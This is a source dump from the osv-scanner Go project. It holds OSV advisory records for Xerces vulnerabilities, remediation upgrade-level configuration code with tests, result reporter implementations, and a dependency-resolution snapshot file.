"https://lists.apache.org/thread.html/rea7b831dceeb2a2fa817be6f63b08722042e3647fb2d47c144370a56%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/49dc6702104a86ecbb40292dcd329ce9ae4c32b74733199ecab14a73@%3Cj-users.xerces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/49dc6702104a86ecbb40292dcd329ce9ae4c32b74733199ecab14a73%40%3Cj-users.xerces.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/XERCESJ-1685" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=787104" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-15T15:51:37Z", "nvd_published_at": "2017-10-30T16:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w4jq-qh47-hvjq", "published": "2022-02-15T01:37:41Z", "modified": "2023-11-08T04:02:26.293474Z", "aliases": [ "CVE-2020-14338" ], "summary": "Improper Input Validation in Xerces", "details": "A flaw was found in Wildfly's implementation of Xerces, specifically in the way the XMLSchemaValidator class in 
the JAXP component of Wildfly enforced the \"use-grammar-pool-only\" feature. This flaw allows a specially-crafted XML file to manipulate the validation process in certain cases. This issue is the same flaw as CVE-2020-14621, which affected OpenJDK, and uses a similar code. All xerces jboss versions before 2.12.0.SP3.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.0.sp3" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.12.0.sp2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-w4jq-qh47-hvjq/GHSA-w4jq-qh47-hvjq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14338" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1860054" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf96c5afb26b596b4b97883aa90b6c0b0fc4c26aaeea7123c21912103@%3Cj-users.xerces.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-24T01:25:49Z", "nvd_published_at": "2020-09-17T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] } ] } ================================================ FILE: internal/remediation/testhelpers_test.go ================================================ package remediation_test import ( "cmp" "maps" "slices" "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" 
"github.com/google/osv-scanner/v2/internal/resolution/clienttest" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/testutility" ) func parseRemediationFixture(t *testing.T, universePath, vulnPath, manifestPath string, opts resolution.ResolveOpts) (*resolution.Result, client.ResolutionClient) { t.Helper() rw, err := manifest.GetReadWriter(manifestPath, "") if err != nil { t.Fatalf("Failed to get ReadWriter: %v", err) } f, err := depfile.OpenLocalDepFile(manifestPath) if err != nil { t.Fatalf("Failed to open manifest: %v", err) } defer f.Close() m, err := rw.Read(f) if err != nil { t.Fatalf("Failed to parse manifest: %v", err) } cl := clienttest.NewMockResolutionClient(t, universePath, vulnPath) res, err := resolution.Resolve(t.Context(), cl, m, opts) if err != nil { t.Fatalf("Failed to resolve manifest: %v", err) } return res, cl } func checkRemediationResults(t *testing.T, res []resolution.Difference) { // ResolutionDiff is too large when dumped as JSON. // Extract & compare a subset of fields that are relevant for the tests. t.Helper() type minimalVuln struct { ID string AffectedNodes []resolve.NodeID } toMinimalVuln := func(v resolution.Vulnerability) minimalVuln { t.Helper() nodes := make(map[resolve.NodeID]struct{}) for _, sg := range v.Subgraphs { nodes[sg.Dependency] = struct{}{} } sortedNodes := slices.AppendSeq(make([]resolve.NodeID, 0, len(nodes)), maps.Keys(nodes)) slices.Sort(sortedNodes) return minimalVuln{ ID: v.OSV.GetId(), AffectedNodes: sortedNodes, } } type minimalPatch struct { Deps []manifest.DependencyPatch // TODO: The dep.Type does not marshal to JSON. 
EcosystemSpecific any } type minimalDiff struct { Patch minimalPatch RemovedVulns []minimalVuln AddedVulns []minimalVuln } minimalRes := make([]minimalDiff, len(res)) for i, diff := range res { minimalRes[i].Patch = minimalPatch{ Deps: diff.Deps, EcosystemSpecific: diff.EcosystemSpecific, } minimalRes[i].AddedVulns = make([]minimalVuln, len(diff.AddedVulns)) for j, v := range diff.AddedVulns { minimalRes[i].AddedVulns[j] = toMinimalVuln(v) } minimalRes[i].RemovedVulns = make([]minimalVuln, len(diff.RemovedVulns)) for j, v := range diff.RemovedVulns { minimalRes[i].RemovedVulns[j] = toMinimalVuln(v) } cmpFn := func(a, b minimalVuln) int { if c := cmp.Compare(a.ID, b.ID); c != 0 { return c } return slices.Compare(a.AffectedNodes, b.AffectedNodes) } slices.SortFunc(minimalRes[i].AddedVulns, cmpFn) slices.SortFunc(minimalRes[i].RemovedVulns, cmpFn) } testutility.NewSnapshot().MatchJSON(t, minimalRes) } ================================================ FILE: internal/remediation/testmain_test.go ================================================ package remediation_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/remediation/upgrade/config.go ================================================ // Package upgrade provides functionality for parsing upgrade configurations for remediation. package upgrade import ( "strings" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) type Config map[string]Level func NewConfig() Config { return make(Config) } // Set the allowed upgrade level for a given pkg name. // If level for pkg was previously set, sets the package to the new level and returns true. // Otherwise, sets the package's level and returns false. 
func (c Config) Set(pkg string, level Level) bool {
	// Look up the previous entry first so the caller can be told about an overwrite.
	_, alreadySet := c[pkg]
	c[pkg] = level

	return alreadySet
}

// SetDefault sets the default allowed upgrade level for packages that weren't explicitly set.
// If default was previously set, sets the default to the new level and returns true.
// Otherwise, sets the default and returns false.
func (c Config) SetDefault(level Level) bool {
	// Empty package name is used as the default level.
	return c.Set("", level)
}

// Get the allowed Level for the given pkg name.
// When pkg has no entry of its own, the default entry is returned. When no
// default was stored either, the map lookup yields the zero Level, which is
// Major (the first iota constant in level.go), so an unconfigured package is
// allowed any upgrade.
func (c Config) Get(pkg string) Level {
	if lvl, ok := c[pkg]; ok {
		return lvl
	}
	// Empty package name is used as the default level.
	return c[""]
}

// ParseUpgradeConfig builds a Config from `--upgrade-config` specs.
// Each spec is either "LEVEL", which sets the default, or "PKG:LEVEL", split
// at the last ':' in the spec. LEVEL must be one of "major", "minor", "patch"
// or "none" (matched exactly as written).
//
// A spec with an empty package name or an unrecognised level is skipped with a
// warning and no error is returned. The affected package then keeps whatever
// Get falls back to, which is Major unless a default was set, so a mistyped
// restriction ends up permitting more than was asked for, not less.
func ParseUpgradeConfig(specs []string) Config {
	config := NewConfig()

	for _, spec := range specs {
		// Split at the last ':' so that package names containing ':' stay intact.
		idx := strings.LastIndex(spec, ":")
		if idx == 0 {
			cmdlogger.Warnf("WARNING: `--upgrade-config %s` - skipping empty package name", spec)
			continue
		}
		// No ':' at all (idx < 0): the whole spec is the level and pkg stays "",
		// which is the key used for the default level.
		pkg := ""
		levelStr := spec
		if idx > 0 {
			pkg = spec[:idx]
			levelStr = spec[idx+1:]
		}
		var level Level
		switch levelStr {
		case "major":
			level = Major
		case "minor":
			level = Minor
		case "patch":
			level = Patch
		case "none":
			level = None
		default:
			// The spec is dropped, not rejected: parsing carries on with the next one.
			cmdlogger.Warnf("WARNING: `--upgrade-config %s` - invalid level string '%s'", spec, levelStr)
			continue
		}
		// The later spec wins; the warning only reports that an earlier one was replaced.
		if config.Set(pkg, level) { // returns true if was previously set
			cmdlogger.Warnf("WARNING: `--upgrade-config %s` - config for package specified multiple times", spec)
		}
	}

	return config
}

================================================
FILE: internal/remediation/upgrade/config_test.go
================================================
package upgrade_test

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/remediation/upgrade"
)

// configSetExpect calls config.Set(pkg, level) and reports a test error when
// the returned "was previously set" flag differs from want.
func configSetExpect(t *testing.T, config upgrade.Config, pkg string, level upgrade.Level, want bool) {
	t.Helper()
	got := config.Set(pkg, level)
	if got != want {
		t.Errorf("Set(%v, %v) got %v, want %v", pkg, level, got, want)
	}
}

// configSetDefaultExpect calls config.SetDefault(level) and reports a test
// error when the returned "was previously set" flag differs from want.
func configSetDefaultExpect(t *testing.T, config upgrade.Config, level upgrade.Level, want bool) {
	t.Helper()
	got := config.SetDefault(level)
	if got != want {
		t.Errorf("SetDefault(%v) got %v, want %v", level, got, want)
	}
}

// configGetExpect reports a test error when config.Get(pkg) is not want.
func configGetExpect(t *testing.T, config upgrade.Config, pkg string, want upgrade.Level) {
	t.Helper()
	if got := config.Get(pkg); got != want {
		t.Errorf("Get(%v) got %v, want %v", pkg, got, want)
	}
}

// TestConfig walks one Config through per-package and default updates and
// checks after every step that packages without their own entry follow the
// current default while packages with an entry keep it.
func TestConfig(t *testing.T) {
	t.Parallel()
	config := upgrade.NewConfig()

	// Default everything to allow major
	// (nothing has been set yet: this pins the zero-value fallback to Major)
	configGetExpect(t, config, "foo", upgrade.Major)
	configGetExpect(t, config, "bar", upgrade.Major)

	// Set specific package
	configSetExpect(t, config, "foo", upgrade.Minor, false)
	configGetExpect(t, config, "foo", upgrade.Minor)
	configGetExpect(t, config, "bar", upgrade.Major)

	// Set package again
	configSetExpect(t, config, "foo", upgrade.None, true)
	configGetExpect(t, config, "foo", upgrade.None)
	configGetExpect(t, config, "bar", upgrade.Major)

	// Set default
	configSetDefaultExpect(t, config, upgrade.Patch, false)
	configGetExpect(t, config, "foo", upgrade.None)
	configGetExpect(t, config, "bar", upgrade.Patch)

	// Set default again
	configSetDefaultExpect(t, config, upgrade.Major, true)
	configGetExpect(t, config, "foo", upgrade.None)
	configGetExpect(t, config, "bar", upgrade.Major)

	// Set other package
	configSetExpect(t, config, "bar", upgrade.Minor, false)
	configGetExpect(t, config, "foo", upgrade.None)
	configGetExpect(t, config, "bar", upgrade.Minor)
	configGetExpect(t, config, "baz", upgrade.Major)
}

================================================
FILE: internal/remediation/upgrade/level.go
================================================
package upgrade

import (
	"deps.dev/util/semver"
)

// Level is the upgrade level constraint that Config stores per package.
type Level int

// The constants run from least to most restrictive. Major is the zero value,
// so a Level that was never assigned behaves as Major.
const (
	Major Level = iota
	Minor
	Patch
	None
)

// Allows returns if the semver.Diff is allowable for this upgrade level constraint.
func (level Level) Allows(diff semver.Diff) bool {
	// An unchanged version is acceptable under every level, including None
	// and values outside the declared constants.
	if diff == semver.Same {
		return true
	}

	switch level {
	case Major:
		return true
	case Minor:
		return diff != semver.DiffMajor
	case Patch:
		// Written as an exclusion list: any Diff other than DiffMajor and
		// DiffMinor passes, not only DiffPatch.
		return (diff != semver.DiffMajor) && (diff != semver.DiffMinor)
	case None:
		return false
	default: // Invalid level
		// An out-of-range Level denies every change.
		return false
	}
}

================================================
FILE: internal/remediation/upgrade/level_test.go
================================================
package upgrade_test

import (
	"slices"
	"testing"

	"deps.dev/util/semver"
	"github.com/google/osv-scanner/v2/internal/remediation/upgrade"
)

// TestLevelAllows checks Allows for every Level against every semver.Diff
// listed in allDiffs, using a per-level list of the diffs that must be refused.
func TestLevelAllows(t *testing.T) {
	t.Parallel()
	// Check every combination of Level + Diff
	allDiffs := [...]semver.Diff{
		semver.Same,
		semver.DiffOther,
		semver.DiffMajor,
		semver.DiffMinor,
		semver.DiffPatch,
		semver.DiffPrerelease,
		semver.DiffBuild,
	}

	// Anything not named here is expected to be allowed, so DiffOther,
	// DiffPrerelease and DiffBuild are expected to pass under Minor and Patch.
	levelDisallowed := map[upgrade.Level][]semver.Diff{
		upgrade.Major: {},
		upgrade.Minor: {semver.DiffMajor},
		upgrade.Patch: {semver.DiffMajor, semver.DiffMinor},
		upgrade.None:  allDiffs[1:], // everything but semver.Same
	}

	for level, disallowed := range levelDisallowed {
		for _, diff := range allDiffs {
			want := !slices.Contains(disallowed, diff)
			got := level.Allows(diff)
			if want != got {
				t.Errorf("(Level: %v, Diff: %v) Allows() = %v, want %v", level, diff, got, want)
			}
		}
	}
}

================================================
FILE: internal/reporter/cyclonedx.go
================================================
package reporter

import (
	"io"
	"strings"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// cycloneDXReporter writes scan results as CycloneDX in the configured
// specification version.
type cycloneDXReporter struct {
	writer  io.Writer
	version models.CycloneDXVersion
}

// PrintResult hands the results to output.PrintCycloneDXResults and logs
// whatever error it returns as warnings, one per line of the error text.
// It always returns nil, so a caller cannot tell from the return value
// whether the document was written completely.
func (r *cycloneDXReporter) PrintResult(vulnerabilityResults *models.VulnerabilityResults) error {
	errs := output.PrintCycloneDXResults(vulnerabilityResults, r.version, r.writer)
	if errs != nil {
		// NOTE(review): every line is logged as a package URL parse failure,
		// whatever the underlying error was; confirm that
		// PrintCycloneDXResults cannot also return write or encoding errors
		// through this value.
		for err := range strings.SplitSeq(errs.Error(), "\n") {
			cmdlogger.Warnf("Failed to parse package URL: %v", err)
		}
	}

	return nil
}

================================================
FILE: internal/reporter/format.go
================================================
package reporter

import (
	"fmt"
	"io"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// format lists the output format names returned by Format.
// NOTE(review): newResultPrinter also accepts "cyclonedx-1-6", which is not
// listed here, so Format() does not advertise it and reporter_test.go, which
// iterates Format(), does not exercise it. Confirm the omission is intended.
var format = []string{"table", "html", "vertical", "json", "markdown", "sarif", "gh-annotations", "cyclonedx-1-4", "cyclonedx-1-5", "spdx-2-3"}

// Format returns the list of output format names.
// The package-level slice itself is returned, not a copy, so callers must
// treat it as read-only.
func Format() []string {
	return format
}

// newResultPrinter maps a format name to the reporter that writes that format
// to writer. "table" and "markdown" share tableReporter and differ only in its
// markdown flag. An unknown name yields a nil printer and an error.
func newResultPrinter(format string, writer io.Writer, terminalWidth int, showAllVulns bool) (resultPrinter, error) {
	switch format {
	case "html":
		return &htmlReporter{writer}, nil
	case "json":
		return &jsonReporter{writer}, nil
	case "vertical":
		return &verticalReporter{writer, terminalWidth, showAllVulns}, nil
	case "table":
		return &tableReporter{writer, false, terminalWidth, showAllVulns}, nil
	case "markdown":
		return &tableReporter{writer, true, terminalWidth, showAllVulns}, nil
	case "sarif":
		return &sarifReporter{writer}, nil
	case "gh-annotations":
		return &ghAnnotationsReporter{writer}, nil
	case "cyclonedx-1-4":
		return &cycloneDXReporter{writer, models.CycloneDXVersion14}, nil
	case "cyclonedx-1-5":
		return &cycloneDXReporter{writer, models.CycloneDXVersion15}, nil
	case "cyclonedx-1-6":
		return &cycloneDXReporter{writer, models.CycloneDXVersion16}, nil
	case "spdx-2-3":
		return &spdxReporter{writer}, nil
	default:
		return nil, fmt.Errorf("%v is not a valid format", format)
	}
}

================================================
FILE: internal/reporter/gh-annotations_reporter.go
================================================
package reporter

import (
	"io"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// ghAnnotationsReporter writes scan results through
// output.PrintGHAnnotationReport.
type ghAnnotationsReporter struct {
	writer io.Writer
}

// PrintResult writes vulnResult to the reporter's writer and returns the
// error from output.PrintGHAnnotationReport unchanged.
func (r *ghAnnotationsReporter) PrintResult(vulnResult *models.VulnerabilityResults) error {
	return output.PrintGHAnnotationReport(vulnResult, r.writer)
}

================================================
FILE: internal/reporter/html_reporter.go
================================================
package reporter

import (
	"io"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// htmlReporter writes scan results as an HTML report.
type htmlReporter struct {
	writer io.Writer
}

// PrintResult writes vulnResult to the reporter's writer and returns the
// error from output.PrintHTMLResults unchanged.
// NOTE(review): the report embeds package and advisory text taken from the
// scan results; escaping is left entirely to output.PrintHTMLResults, so
// verify it there.
func (r *htmlReporter) PrintResult(vulnResult *models.VulnerabilityResults) error {
	return output.PrintHTMLResults(vulnResult, r.writer)
}

================================================
FILE: internal/reporter/json_reporter.go
================================================
package reporter

import (
	"io"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// jsonReporter writes scan results as JSON.
type jsonReporter struct {
	writer io.Writer
}

// PrintResult writes vulnResult to the reporter's writer and returns the
// error from output.PrintJSONResults unchanged.
func (r *jsonReporter) PrintResult(vulnResult *models.VulnerabilityResults) error {
	return output.PrintJSONResults(vulnResult, r.writer)
}

================================================
FILE: internal/reporter/reporter.go
================================================
// Package reporter provides functionality for reporting scan results in various formats.
package reporter import ( "io" "github.com/google/osv-scanner/v2/pkg/models" ) type resultPrinter interface { // PrintResult prints the models.VulnerabilityResults per the logic of the // actual reporter PrintResult(vulnResult *models.VulnerabilityResults) error } func PrintResult( vulnResult *models.VulnerabilityResults, format string, writer io.Writer, terminalWidth int, showAllVulns bool, ) error { r, err := newResultPrinter(format, writer, terminalWidth, showAllVulns) if err != nil { return err } return r.PrintResult(vulnResult) } ================================================ FILE: internal/reporter/reporter_test.go ================================================ package reporter_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/reporter" "github.com/google/osv-scanner/v2/pkg/models" ) func TestPrintResult(t *testing.T) { t.Parallel() for _, format := range reporter.Format() { stdout := &bytes.Buffer{} err := reporter.PrintResult(&models.VulnerabilityResults{}, format, stdout, 0, false) if err != nil { t.Errorf("Reporter for '%s' format not implemented", format) } } } func TestPrintResult_UnsupportedFormatter(t *testing.T) { t.Parallel() stdout := &bytes.Buffer{} err := reporter.PrintResult(&models.VulnerabilityResults{}, "unsupported", stdout, 0, true) if err == nil { t.Errorf("Did not get expected error") } } ================================================ FILE: internal/reporter/sarif_reporter.go ================================================ package reporter import ( "io" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type sarifReporter struct { writer io.Writer } func (r *sarifReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { return output.PrintSARIFReport(vulnResult, r.writer) } ================================================ FILE: internal/reporter/spdx.go ================================================ package reporter import ( "io" 
"github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type spdxReporter struct { writer io.Writer } func (r *spdxReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { return output.PrintSPDXResults(vulnResult, r.writer) } ================================================ FILE: internal/reporter/table_reporter.go ================================================ package reporter import ( "fmt" "io" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type tableReporter struct { writer io.Writer markdown bool // 0 indicates not a terminal output terminalWidth int showAllVulns bool } func (r *tableReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { if len(vulnResult.Results) == 0 && vulnResult.LicenseSummary == nil && !cmdlogger.HasErrored() { fmt.Fprintf(r.writer, "No issues found\n") return nil } if r.markdown { output.PrintMarkdownTableResults(vulnResult, r.writer, r.showAllVulns) } else { output.PrintTableResults(vulnResult, r.writer, r.terminalWidth, r.showAllVulns) } return nil } ================================================ FILE: internal/reporter/vertical_reporter.go ================================================ package reporter import ( "fmt" "io" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" "github.com/jedib0t/go-pretty/v6/text" ) type verticalReporter struct { writer io.Writer // 0 indicates not a terminal output terminalWidth int showAllVulns bool } func (r *verticalReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { if len(vulnResult.Results) == 0 && vulnResult.LicenseSummary == nil && !cmdlogger.HasErrored() { fmt.Fprintf(r.writer, "No issues found\n") return nil } if r.terminalWidth <= 0 { text.DisableColors() } 
output.PrintVerticalResults(vulnResult, r.writer, r.showAllVulns) return nil } ================================================ FILE: internal/resolution/__snapshots__/resolve_test.snap ================================================ [TestResolve/complex - 1] complex 9.9.9 ├─ reg|KnownAs="chuck"|Selector="" | alice@^1.0.0 1.0.1 │ └─ $1@^2.0.0 ├─ 1: reg|Selector="" | bob@2.2.2 2.2.2 └─ reg|Selector="" | dave@~3.3.3 3.3.3 ├─ $1@^2.2.2 └─ reg|KnownAs="duck"|Selector="" | chuck@^2.0.0 2.0.0 └─ $1@^2.0.1 --- [TestResolve/complex - 2] [ { "ID": "CMPLX-0000-0000", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "complex", "VersionType": 1, "Version": "9.9.9" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "alice", "VersionType": 1, "Version": "1.0.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "CMPLX-1000-0000", "DevOnly": false, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "complex", "VersionType": 1, "Version": "9.9.9" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "2.2.2", "Type": {} }, { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "alice", "VersionType": 1, "Version": "1.0.1" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bob", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 0, "To": 2, "Requirement": "2.2.2", "Type": {} }, { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} }, { "From": 3, "To": 2, "Requirement": "^2.2.2", 
"Type": {} }, { "From": 4, "To": 2, "Requirement": "^2.0.1", "Type": {} } ], "Children": null }, "3": { "Version": { "System": 3, "Name": "dave", "VersionType": 1, "Version": "3.3.3" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ], "Children": [ { "From": 3, "To": 2, "Requirement": "^2.2.2", "Type": {} }, { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ] }, "4": { "Version": { "System": 3, "Name": "chuck", "VersionType": 1, "Version": "2.0.0" }, "Distance": 1, "Parents": [ { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ], "Children": [ { "From": 4, "To": 2, "Requirement": "^2.0.1", "Type": {} } ] } } } ] }, { "ID": "CMPLX-2000-0000", "DevOnly": true, "Subgraphs": [ { "Dependency": 4, "Nodes": { "0": { "Version": { "System": 3, "Name": "complex", "VersionType": 1, "Version": "9.9.9" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "dave", "VersionType": 1, "Version": "3.3.3" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ], "Children": [ { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ] }, "4": { "Version": { "System": 3, "Name": "chuck", "VersionType": 1, "Version": "2.0.0" }, "Distance": 0, "Parents": [ { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/diamond - 1] diamond 1.0.0 ├─ reg|Selector="" | pkg@^1.0.0 1.0.0 │ └─ 1: reg|Selector="" | bad@^1.0.0 1.1.1 └─ reg|Selector="" | dep-one@^1.0.0 1.0.0 ├─ $1@^1.0.0 └─ reg|Selector="" | dep-two@^1.0.0 1.0.0 └─ $1@^1.0.0 --- [TestResolve/diamond - 2] [ { "ID": "DIA-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 3, "Nodes": { "0": { "Version": { "System": 3, "Name": "diamond", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { 
"From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "pkg", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dep-one", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} }, { "From": 2, "To": 4, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 1, "To": 3, "Requirement": "^1.0.0", "Type": {} }, { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} }, { "From": 4, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": null }, "4": { "Version": { "System": 3, "Name": "dep-two", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 2, "To": 4, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 4, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] } } } ] } ] --- [TestResolve/different-pkgs - 1] different-pkgs 3.0.0 ├─ reg|Selector="" | bad2@^1.0.0 1.0.0 └─ reg|Selector="" | dependency@^1.0.0 1.0.0 └─ reg|Selector="" | bad@^1.0.0 1.1.1 --- [TestResolve/different-pkgs - 2] [ { "ID": "OSV-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 3, "Nodes": { "0": { "Version": { "System": 3, "Name": "different-pkgs", "VersionType": 1, "Version": "3.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", 
